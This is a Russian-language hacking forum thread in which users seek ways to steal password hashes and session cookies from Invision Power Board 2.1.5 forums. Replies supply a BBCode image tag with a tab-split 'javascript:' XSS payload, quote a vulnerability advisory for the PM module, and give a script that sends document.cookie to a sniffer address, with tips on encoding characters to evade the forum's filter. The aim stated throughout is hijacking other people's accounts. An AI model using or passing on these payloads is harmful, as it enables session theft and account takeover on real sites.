Invision 2.1.5 Xss
 

Вобшем как можно унать хэш на это версии движка,
помню можно было через "жалобу" но вот работает ли эта шняга на этой версии не знаю, знал бы не спрашивал.

а попробовать? не работает.

Xss баг через репорт в 2.1.5 исправлен, он для 2.1.4

Спасибо буду знать, а не подскажете как нибудь там можно сваравать хэш, может сплойт есть. Знаю что гугл рулит, но всё так преятней узнать от знающих людей. ПРобывал сам поискать чтоб хэш cтырить, но что то не выходит.

sexxx, никак, пока XSSбаги там не нашли.

Пока ничего такого нет. Версия ещё девственная. В смысле не поимел пока никто.
Можно через аватарку попробовать вроде бы. Но это только под Ie.

вместо пробелов в слове javascript надо поставить табулюцию. Работает под Ие и опера

[img]j a v a s c r i p t:alert(/XSS/).jpg[/img]

Invision Power Board 2.1.5 до 2006-03-08 и версии до 2.1.x

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в модуле PM. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

P.S.: В инете искать пробовали?

Работает спасибо :)))
а теперь после того как получил алерт что мне делать?
заранее спасибо

тебе ввобщем надо получить куки припомощи JavaScript.
вот пример:

<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>

только теперь тебе это надо вставить в ту XSS. Скажу сразу что форум не воспринимает ",?,;, пробел. Тебе эти символы надо зашифровать с помощью http://ha.ckers.org/xss.html и немного до делать сам скрипт возможно =)